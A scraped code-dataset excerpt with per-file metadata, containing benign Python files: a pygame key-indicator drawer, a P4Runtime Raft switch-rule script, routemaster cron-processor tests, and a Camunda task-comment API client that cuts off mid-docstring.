5c55cb1bd7c8e9dedf45d620fcd01d2f3ed0109e
|
[
"MIT"
] | null | null | null |
getKey.py
|
UcanYusuf/ArrowGui
|
5c55cb1bd7c8e9dedf45d620fcd01d2f3ed0109e
|
[
"MIT"
] | null | null | null |
import pygame
import sys
#pygame.init()
#win = pygame.display.set_mode((400, 140))
#font = pygame.font.SysFont('Arial', 50)
def getKey(win, font, keyInput):
    """Draw the eight key indicators (W/A/S/D plus the arrow keys) on *win*.

    Each key gets a 60x60 square: red ([220, 30, 30]) while the key is held,
    orange ([255, 100, 0]) otherwise, with its label blitted on top in black.
    Finally the whole display is flushed with pygame.display.update().

    Args:
        win: pygame display surface to draw on.
        font: pygame font used to render the key labels.
        keyInput: pressed-key state indexable by key code — presumably the
            result of pygame.key.get_pressed(); the large codes (1073741903+)
            are the arrow-key constants. TODO confirm against the caller.
    """
    # (key code, label, square origin, label position) — one row per key.
    # Positions are taken verbatim from the original hand-unrolled version.
    layout = (
        (119, 'W', (70, 5), (80, 10)),            # W
        (97, 'A', (5, 70), (20, 70)),             # A
        (115, 'S', (70, 70), (85, 70)),           # S
        (100, 'D', (135, 70), (150, 70)),         # D
        (1073741906, '▲', (270, 5), (282, 5)),    # UP
        (1073741904, '◄', (205, 70), (208, 73)),  # LEFT
        (1073741905, '▼', (270, 70), (282, 73)),  # DOWN
        (1073741903, '►', (335, 70), (350, 73)),  # RIGHT
    )
    for code, label, (x, y), label_pos in layout:
        # Only the fill color depends on the key state; square and label
        # are identical in both branches of the original code.
        color = [220, 30, 30] if keyInput[code] else [255, 100, 0]
        pygame.draw.rect(win, color, pygame.Rect(x, y, 60, 60))
        win.blit(font.render(label, True, (0, 0, 0)), label_pos)
    pygame.display.update()
| 41.552239
| 75
| 0.52227
| 451
| 2,784
| 3.239468
| 0.144124
| 0.043806
| 0.15332
| 0.186174
| 0.807666
| 0.807666
| 0.807666
| 0.807666
| 0.807666
| 0.741958
| 0
| 0.203659
| 0.253951
| 2,784
| 66
| 76
| 42.181818
| 0.495908
| 0.043103
| 0
| 0.461538
| 0
| 0
| 0.006185
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019231
| false
| 0
| 0.038462
| 0
| 0.057692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7af3206b4e72fb1b43e5d5ec83eb9c6b86f05cc6
| 2,791
|
py
|
Python
|
P4Runtime_test.py
|
EmanueleGallone/P4Raft
|
7c943cca6f1c3d29c82fae56cdc66951c32310c6
|
[
"Apache-2.0"
] | null | null | null |
P4Runtime_test.py
|
EmanueleGallone/P4Raft
|
7c943cca6f1c3d29c82fae56cdc66951c32310c6
|
[
"Apache-2.0"
] | null | null | null |
P4Runtime_test.py
|
EmanueleGallone/P4Raft
|
7c943cca6f1c3d29c82fae56cdc66951c32310c6
|
[
"Apache-2.0"
] | null | null | null |
# ALREADY DONE IN s1-runtime.json
# INTENDED AS AN EXAMPLE FOR FUTURE DEVELOPMENT
#!/usr/bin/env python2
import grpc
import os, sys
from time import sleep
# Import P4Runtime lib from parent utils dir
# Probably there's a better way of doing this.
sys.path.append(
os.path.join(os.path.dirname(os.path.abspath(__file__)),
'utils/p4runtime_lib'))
import bmv2
from error_utils import printGrpcError
from switch import ShutdownAllSwitchConnections
import helper
# Compiled P4 program metadata, used to resolve table/action names to IDs.
p4info_file_path = "build/Raft.p4.p4info.txt"
p4info_helper = helper.P4InfoHelper(p4info_file_path)
# Open a P4Runtime (gRPC) connection to the BMv2 software switch "s1";
# all requests are also dumped to the proto log file for debugging.
s1 = bmv2.Bmv2SwitchConnection(
name='s1',
address='127.0.0.1:50051',
device_id=0,
proto_dump_file='logs/s1-p4runtime-requests_my_py.txt')
# Perform the P4Runtime master arbitration handshake before writing entries.
s1.MasterArbitrationUpdate()
# Install the follower-timeout rule: match follower role (0) with message
# type 10 and the given destination address.
table_entry2 = p4info_helper.buildTableEntry(
table_name="MyIngress.follower",
match_fields={
"meta.raft_metadata.role": 0,
"hdr.raft.messageType": 10,
"hdr.ipv4.dstAddr": [0x0, 0xa, 1]
},
action_name="MyIngress.follower_timeout",
action_params={}
)
s1.WriteTableEntry(table_entry2)
# NOTE(review): the message says "leader" but the entry written above is the
# follower rule — confirm which wording is intended.
print("Installed leader table entry rule on {}".format(s1.name))
def install_s1__entry_rule(): # DO NOT USE
# NOTE(review): this function appears to be a verbatim copy of the module-level
# script kept only as a reference example ("DO NOT USE"), and its body seems to
# have lost its indentation (statements sit at column 0 under the def) — as
# written this would not parse; confirm against the original file.
# ALREADY DONE IN s1-runtime.json
# INTENDED AS AN EXAMPLE FOR FUTURE DEVELOPMENT
#!/usr/bin/env python2
import grpc
import os
from time import sleep
# Import P4Runtime lib from parent utils dir
# Probably there's a better way of doing this.
sys.path.append(
os.path.join(os.path.dirname(os.path.abspath(__file__)),
'utils/p4runtime_lib'))
import bmv2
from error_utils import printGrpcError
from switch import ShutdownAllSwitchConnections
import helper
# Compiled P4 program metadata, used to resolve table/action names to IDs.
p4info_file_path = "build/Raft.p4.p4info.txt"
p4info_helper = helper.P4InfoHelper(p4info_file_path)
s1 = bmv2.Bmv2SwitchConnection(
name='s1',
address='127.0.0.1:50051',
device_id=0,
proto_dump_file='logs/s1-p4runtime-requests_my_py.txt')
s1.MasterArbitrationUpdate()
# Leader rule: role 2 with message type 2 triggers spread_new_request.
table_entry = p4info_helper.buildTableEntry(
table_name="MyIngress.leader",
match_fields={
"meta.raft_metadata.role": 2,
"hdr.raft.messageType": 2
},
action_name="MyIngress.spread_new_request",
action_params={}
)
# Follower rule: role 0, message type 10, fixed destination address.
table_entry2 = p4info_helper.buildTableEntry(
table_name="MyIngress.follower",
match_fields={
"meta.raft_metadata.role": 0,
"hdr.raft.messageType": 10,
"hdr.ipv4.dstAddr": ["10.0.1.254", 32]
},
action_name="MyIngress.follower_timeout",
action_params={}
)
s1.WriteTableEntry(table_entry)
s1.WriteTableEntry(table_entry2)
print("Installed leader table entry rule on {}".format(s1.name))
| 28.773196
| 68
| 0.691508
| 359
| 2,791
| 5.197772
| 0.309192
| 0.019293
| 0.030011
| 0.051447
| 0.929796
| 0.929796
| 0.889068
| 0.889068
| 0.889068
| 0.889068
| 0
| 0.043088
| 0.20172
| 2,791
| 97
| 68
| 28.773196
| 0.794434
| 0.137585
| 0
| 0.760563
| 0
| 0
| 0.239149
| 0.11227
| 0
| 0
| 0.002504
| 0
| 0
| 1
| 0.014085
| false
| 0
| 0.197183
| 0
| 0.211268
| 0.056338
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24e15dc3b700adabacfe7490b331e3ae9a23f5d5
| 113
|
py
|
Python
|
PedicleScrewPlanner/PedicleScrewPlannerWizard/__init__.py
|
lassoan/PedicleScrewSimulator
|
7bf04fc00695115ac64742e692849a15e430f9dc
|
[
"MIT"
] | 4
|
2018-10-25T03:39:33.000Z
|
2021-09-16T02:56:59.000Z
|
PedicleScrewPlanner/PedicleScrewPlannerWizard/__init__.py
|
jumbojing/PedicleScrewSimulator
|
cbb84cd84cd5617693f5ff29593bc396ecb1cb8a
|
[
"MIT"
] | 6
|
2019-06-06T12:41:25.000Z
|
2021-06-11T02:29:17.000Z
|
PedicleScrewPlanner/PedicleScrewPlannerWizard/__init__.py
|
lassoan/PedicleScrewSimulator
|
7bf04fc00695115ac64742e692849a15e430f9dc
|
[
"MIT"
] | 8
|
2019-06-06T11:16:23.000Z
|
2021-08-03T02:13:30.000Z
|
from .PlanningMeasurementsStep import *
from .PlanningLandmarksStep import *
from .PlanningGradeStep import *
| 28.25
| 40
| 0.814159
| 9
| 113
| 10.222222
| 0.555556
| 0.217391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132743
| 113
| 3
| 41
| 37.666667
| 0.938776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
703d79ff89a3b6a1caf72e00379c7eae24ce4bac
| 135
|
py
|
Python
|
chariot/transformer/generator/__init__.py
|
Y-Kuro-u/chariot
|
032f3eecdd55b30c65351e1e636c939c4b20919e
|
[
"Apache-2.0"
] | 134
|
2018-06-11T01:40:14.000Z
|
2021-11-15T12:34:38.000Z
|
chariot/transformer/generator/__init__.py
|
Y-Kuro-u/chariot
|
032f3eecdd55b30c65351e1e636c939c4b20919e
|
[
"Apache-2.0"
] | 10
|
2018-06-17T10:45:50.000Z
|
2021-04-05T05:51:11.000Z
|
chariot/transformer/generator/__init__.py
|
Y-Kuro-u/chariot
|
032f3eecdd55b30c65351e1e636c939c4b20919e
|
[
"Apache-2.0"
] | 8
|
2019-02-23T06:43:21.000Z
|
2021-02-18T06:05:11.000Z
|
from .target_generator import ShiftedTarget
from .target_generator import ShuffledTarget
from .source_generator import ShuffledSource
| 27
| 44
| 0.881481
| 15
| 135
| 7.733333
| 0.533333
| 0.387931
| 0.327586
| 0.431034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096296
| 135
| 4
| 45
| 33.75
| 0.95082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
704ec43dae7713b46a929e86eb0e8efd8ee56434
| 11,811
|
py
|
Python
|
routemaster/tests/test_cron_processors.py
|
thread/routemaster
|
1fd997a3bcee5e6760e9f7a60cb54323c3dfdc41
|
[
"MIT"
] | 13
|
2018-01-16T14:26:27.000Z
|
2022-03-19T12:43:17.000Z
|
routemaster/tests/test_cron_processors.py
|
thread/routemaster
|
1fd997a3bcee5e6760e9f7a60cb54323c3dfdc41
|
[
"MIT"
] | 86
|
2018-01-03T17:00:56.000Z
|
2021-12-06T12:58:06.000Z
|
routemaster/tests/test_cron_processors.py
|
thread/routemaster
|
1fd997a3bcee5e6760e9f7a60cb54323c3dfdc41
|
[
"MIT"
] | 3
|
2018-02-21T23:13:45.000Z
|
2022-03-19T12:43:23.000Z
|
import datetime
import contextlib
from unittest import mock
import freezegun
import dateutil.tz
from routemaster.config import (
TimezoneAwareTrigger,
MetadataTimezoneAwareTrigger,
)
from routemaster.state_machine import labels_in_state_with_metadata
from routemaster.cron_processors import (
TimezoneAwareProcessor,
MetadataTimezoneAwareProcessor,
)
# Shared tzinfo instance used to build timezone-aware datetimes in these tests.
UTC = dateutil.tz.gettz('UTC')
@contextlib.contextmanager
def mock_cron_processors_functools_partial():
    """Patch ``functools`` inside routemaster.cron_processors.

    Yields the mocked ``functools.partial`` so tests can assert on how the
    processor builds its label-provider callable.
    """
    patcher = mock.patch(
        'routemaster.cron_processors.functools',
        autospec=True,
    )
    with patcher as functools_mock:
        yield functools_mock.partial
def recently() -> datetime.datetime:
    """
    Helper for getting a time shortly before now. This is mostly expected to be
    used for the construction of cron processors, so that their construction
    time is separate to (and earlier than) the current time when they're run
    but otherwise very close (to avoid changing the semantics of the test).
    """
    one_tick = datetime.timedelta(microseconds=1)
    return datetime.datetime.now(UTC) - one_tick
# Test TimezoneAwareProcessor
def test_timezone_aware_processor_repr() -> None:
    """The repr should surface both the trigger's timezone and its time."""
    callback = mock.Mock()
    processor = TimezoneAwareProcessor(
        callback,
        TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC'),
    )
    description = repr(processor)
    assert 'Etc/UTC' in description
    assert '12:00' in description
@freezegun.freeze_time('2019-08-01 12:00 UTC')
def test_timezone_aware_processor_runs_on_time() -> None:
    """Fires the callback when now matches the trigger time in its zone."""
    mock_callable = mock.Mock()
    trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
    # Construct just before "now" so construction time precedes the run.
    with freezegun.freeze_time(recently()):
        processor = TimezoneAwareProcessor(mock_callable, trigger)
    processor()
    mock_callable.assert_called_once_with()
@freezegun.freeze_time('2019-08-01 12:00 UTC')
def test_timezone_aware_processor_runs_on_time_other_timezone() -> None:
    """13:00 Europe/London corresponds to 12:00 UTC in August (BST), so fires."""
    mock_callable = mock.Mock()
    trigger = TimezoneAwareTrigger(datetime.time(13, 0), 'Europe/London')
    with freezegun.freeze_time(recently()):
        processor = TimezoneAwareProcessor(mock_callable, trigger)
    processor()
    mock_callable.assert_called_once_with()
@freezegun.freeze_time('2019-08-01 12:00 UTC')
def test_timezone_aware_processor_doesnt_run_when_timezone_doesnt_match() -> None:
    """12:00 Europe/London is not 12:00 UTC in August, so nothing fires."""
    mock_callable = mock.Mock()
    trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Europe/London')
    with freezegun.freeze_time(recently()):
        processor = TimezoneAwareProcessor(mock_callable, trigger)
    processor()
    mock_callable.assert_not_called()
@freezegun.freeze_time('2019-08-01 15:00 UTC')
def test_timezone_aware_processor_doesnt_run_at_wrong_time() -> None:
    """Nothing fires at 15:00 when the trigger (and construction) is 12:00."""
    mock_callable = mock.Mock()
    trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
    # Constructed "recently" at 15:00, i.e. after the trigger time passed.
    with freezegun.freeze_time(recently()):
        processor = TimezoneAwareProcessor(mock_callable, trigger)
    processor()
    mock_callable.assert_not_called()
@freezegun.freeze_time('2019-08-01 15:00 UTC')
def test_timezone_aware_processor_runs_if_delayed_since_construction() -> None:
    """Still fires at 15:00 because 12:00 passed since construction at 11:00."""
    mock_callable = mock.Mock()
    trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
    with freezegun.freeze_time('2019-08-01 11:00 UTC'):
        processor = TimezoneAwareProcessor(mock_callable, trigger)
    processor()
    mock_callable.assert_called_once_with()
@freezegun.freeze_time('2019-08-01 15:00 UTC')
def test_timezone_aware_processor_runs_if_delayed_since_last_run() -> None:
    """Fires late (at 15:00) when 12:00 passed between two invocations."""
    mock_callable = mock.Mock()
    trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
    with freezegun.freeze_time('2019-08-01 01:00 UTC'):
        processor = TimezoneAwareProcessor(mock_callable, trigger)
    # First run at 11:00 — before the trigger time, so no call yet.
    with freezegun.freeze_time('2019-08-01 11:00 UTC'):
        processor()
        mock_callable.assert_not_called() # not yet
    processor()
    mock_callable.assert_called_once_with()
def test_timezone_aware_processor_doesnt_run_multiple_times() -> None:
    """Once fired for a given trigger, an immediate re-run must not fire again."""
    mock_callable = mock.Mock()
    trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
    with freezegun.freeze_time('2019-08-01 01:00 UTC'):
        processor = TimezoneAwareProcessor(mock_callable, trigger)
    with freezegun.freeze_time('2019-08-01 11:00 UTC'):
        processor()
        mock_callable.assert_not_called() # not yet
    with freezegun.freeze_time('2019-08-01 15:00 UTC') as frozen_time:
        processor()
        # Advance a hair so the second run happens at a distinct instant.
        frozen_time.tick(delta=datetime.timedelta(microseconds=10))
        processor()
    mock_callable.assert_called_once_with()
def test_timezone_aware_processor_doesnt_doesnt_bubble_internal_exceptions() -> None:
    """Back-to-back runs at the same frozen instant must not raise."""
    # Note: the processor assumes that the callable they're passed won't raise,
    # because that is assumed to be `cron.process_job` which has its own error
    # handling. The processor does however need to ensure that other errors it
    # may encounter while checking whether to run are handled.
    mock_callable = mock.Mock()
    trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
    with freezegun.freeze_time('2019-08-01 01:00 UTC'):
        processor = TimezoneAwareProcessor(mock_callable, trigger)
    with freezegun.freeze_time('2019-08-01 11:00 UTC'):
        processor()
        mock_callable.assert_not_called() # not yet
    with freezegun.freeze_time('2019-08-01 15:00 UTC'):
        processor()
        # Deliberately reproduce the impossible scenario which
        # test_timezone_aware_processor_doesnt_run_multiple_times carefully
        # avoids
        processor()
    mock_callable.assert_called_once_with()
# Test MetadataTimezoneAwareProcessor
def test_metadata_timezone_aware_processor_repr() -> None:
    """The repr should surface the metadata path and the trigger time."""
    callback = mock.Mock()
    trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
    with freezegun.freeze_time(recently()):
        processor = MetadataTimezoneAwareProcessor(callback, trigger)
    description = repr(processor)
    assert 'tz' in description
    assert '12:00' in description
@freezegun.freeze_time('2019-01-01 12:00 UTC')
def test_metadata_timezone_aware_processor_runs_on_time() -> None:
    """In January both Etc/UTC and Europe/London read 12:00, so both match."""
    mock_callable = mock.Mock()
    trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
    with freezegun.freeze_time(recently()):
        processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
    with mock_cron_processors_functools_partial() as mock_partial:
        processor()
    # The processor builds a label provider filtering on metadata path ['tz']
    # restricted to the timezones whose local time matched the trigger.
    mock_partial.assert_called_once_with(
        labels_in_state_with_metadata,
        path=['tz'],
        values=mock.ANY,
    )
    timezones = mock_partial.call_args[1]['values']
    assert 'Etc/UTC' in timezones
    assert 'Europe/London' in timezones
    mock_callable.assert_called_once_with(label_provider=mock.ANY)
@freezegun.freeze_time('2019-08-01 12:00 UTC')
def test_metadata_timezone_aware_processor_runs_on_time_other_timezone() -> None:
    """In August only Europe/London (BST) reads 13:00 at 12:00 UTC."""
    mock_callable = mock.Mock()
    trigger = MetadataTimezoneAwareTrigger(datetime.time(13, 0), ['tz'])
    with freezegun.freeze_time(recently()):
        processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
    with mock_cron_processors_functools_partial() as mock_partial:
        processor()
    mock_partial.assert_called_once_with(
        labels_in_state_with_metadata,
        path=['tz'],
        values=mock.ANY,
    )
    timezones = mock_partial.call_args[1]['values']
    # UTC's local time is 12:00, not 13:00, so it must be excluded.
    assert 'Etc/UTC' not in timezones
    assert 'Europe/London' in timezones
    mock_callable.assert_called_once_with(label_provider=mock.ANY)
@freezegun.freeze_time('2019-08-01 12:05 UTC')
def test_metadata_timezone_processor_doesnt_run_at_wrong_time() -> None:
    """At 12:05, a processor constructed "recently" must not fire for 12:00."""
    mock_callable = mock.Mock()
    trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
    with freezegun.freeze_time(recently()):
        processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
    with mock_cron_processors_functools_partial() as mock_partial:
        processor()
    mock_partial.assert_not_called()
    mock_callable.assert_not_called()
@freezegun.freeze_time('2019-08-01 12:05 UTC')
def test_metadata_timezone_processor_runs_if_delayed_since_construction() -> None:
    """Fires late at 12:05 because 12:00 UTC passed since construction at 11:59."""
    mock_callable = mock.Mock()
    trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
    with freezegun.freeze_time('2019-08-01 11:59 UTC'):
        processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
    with mock_cron_processors_functools_partial() as mock_partial:
        processor()
    mock_partial.assert_called_once_with(
        labels_in_state_with_metadata,
        path=['tz'],
        values=mock.ANY,
    )
    timezones = mock_partial.call_args[1]['values']
    # Only zones whose local 12:00 fell within the missed window qualify;
    # Europe/London's 12:00 local (BST) was at 11:00 UTC, before construction.
    assert 'Etc/UTC' in timezones
    assert 'Europe/London' not in timezones
    mock_callable.assert_called_once_with(label_provider=mock.ANY)
@freezegun.freeze_time('2019-08-01 12:05 UTC')
def test_metadata_timezone_processor_runs_if_delayed_since_last_run() -> None:
    # The 12:00 trigger falls between the first invocation (at 11:58) and the
    # second (at 12:05, the decorator's frozen time): the first must not fire,
    # the delayed second one must.
    mock_callable = mock.Mock()
    trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
    with freezegun.freeze_time('2019-08-01 11:55 UTC'):
        processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
    with freezegun.freeze_time('2019-08-01 11:58 UTC'):
        with mock_cron_processors_functools_partial() as mock_partial:
            processor()
        mock_partial.assert_not_called()  # not yet
    with mock_cron_processors_functools_partial() as mock_partial:
        processor()
    mock_partial.assert_called_once_with(
        labels_in_state_with_metadata,
        path=['tz'],
        values=mock.ANY,
    )
    timezones = mock_partial.call_args[1]['values']
    # Only the zone whose local 12:00 was crossed since the last run matches.
    assert 'Etc/UTC' in timezones
    assert 'Europe/London' not in timezones
    mock_callable.assert_called_once_with(label_provider=mock.ANY)
def test_metadata_timezone_processor_doesnt_run_multiply() -> None:
    # Two invocations an instant apart, both after the 12:00 trigger has been
    # crossed, must result in exactly one run of the callable.
    mock_callable = mock.Mock()
    trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
    with freezegun.freeze_time('2019-08-01 11:58 UTC'):
        processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
    with freezegun.freeze_time('2019-08-01 12:05 UTC') as frozen_time:
        with mock_cron_processors_functools_partial() as mock_partial:
            processor()
            # Advance the frozen clock a tiny amount so the second call
            # happens at a strictly later instant than the first.
            frozen_time.tick(delta=datetime.timedelta(microseconds=10))
            processor()
    mock_partial.assert_called_once_with(
        labels_in_state_with_metadata,
        path=['tz'],
        values=mock.ANY,
    )
    timezones = mock_partial.call_args[1]['values']
    assert 'Etc/UTC' in timezones
    assert 'Europe/London' not in timezones
    mock_callable.assert_called_once_with(label_provider=mock.ANY)
def test_metadata_timezone_processor_doesnt_bubble_internal_exceptions() -> None:
    # Note: the processor assumes that the callable they're passed won't raise,
    # because that is assumed to be `cron.process_job` which has its own error
    # handling. The processor does however need to ensure that other errors it
    # may encounter while checking whether to run are handled.
    mock_callable = mock.Mock()
    trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
    with freezegun.freeze_time('2019-08-01 11:58 UTC'):
        processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
    with freezegun.freeze_time('2019-08-01 12:05 UTC'):
        processor()
        # Deliberately reproduce the impossible scenario which
        # test_metadata_timezone_processor_doesnt_run_multiply carefully
        # avoids: a second call at the very same frozen instant.
        processor()
    mock_callable.assert_called_once_with(label_provider=mock.ANY)
| 32.53719
| 85
| 0.725933
| 1,461
| 11,811
| 5.601643
| 0.116359
| 0.076246
| 0.081256
| 0.07588
| 0.89174
| 0.883675
| 0.875
| 0.868157
| 0.860826
| 0.826491
| 0
| 0.040545
| 0.179324
| 11,811
| 362
| 86
| 32.627072
| 0.803776
| 0.100838
| 0
| 0.735426
| 0
| 0
| 0.078502
| 0.003499
| 0
| 0
| 0
| 0
| 0.174888
| 1
| 0.085202
| false
| 0
| 0.035874
| 0
| 0.125561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5691d52a0ddfab215f02af6c00d1196d5a32c9b4
| 17,011
|
py
|
Python
|
openapi-python-client/openapi_client/api/task_comment_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
openapi-python-client/openapi_client/api/task_comment_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
openapi-python-client/openapi_client/api/task_comment_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Camunda BPM REST API
OpenApi Spec for Camunda BPM REST API. # noqa: E501
The version of the OpenAPI document: 7.13.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
from openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class TaskCommentApi(object):
    """NOTE: This class is auto generated by OpenAPI Generator
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    def __init__(self, api_client=None):
        # An ApiClient carries connection configuration; a default one is
        # created when the caller does not supply their own.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def create_comment(self, id, **kwargs):  # noqa: E501
        """create_comment  # noqa: E501

        Creates a comment for a task by id.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_comment(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: The id of the task to add the comment to. (required)
        :param CommentDto comment_dto: **Note:** Only the `message` property will be used. Every other property passed to this endpoint will be ignored.
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: CommentDto
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: delegate to the *_with_http_info variant, keeping only
        # the response body (not status code/headers).
        kwargs['_return_http_data_only'] = True
        return self.create_comment_with_http_info(id, **kwargs)  # noqa: E501

    def create_comment_with_http_info(self, id, **kwargs):  # noqa: E501
        """create_comment  # noqa: E501

        Creates a comment for a task by id.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_comment_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: The id of the task to add the comment to. (required)
        :param CommentDto comment_dto: **Note:** Only the `message` property will be used. Every other property passed to this endpoint will be ignored.
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(CommentDto, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = [
            'id',
            'comment_dto'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Reject any kwarg that is neither an endpoint parameter nor one of
        # the generic request-control options.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_comment" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `create_comment`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The CommentDto (if supplied) is sent as the JSON request body.
        body_params = None
        if 'comment_dto' in local_var_params:
            body_params = local_var_params['comment_dto']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        # All transport concerns (sync/async dispatch, (de)serialization,
        # timeouts) are handled by ApiClient.call_api.
        return self.api_client.call_api(
            '/task/{id}/comment/create', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='CommentDto',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_comment(self, id, comment_id, **kwargs):  # noqa: E501
        """get_comment  # noqa: E501

        Retrieves a task comment by task id and comment id.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_comment(id, comment_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: The id of the task. (required)
        :param str comment_id: The id of the comment to be retrieved. (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: CommentDto
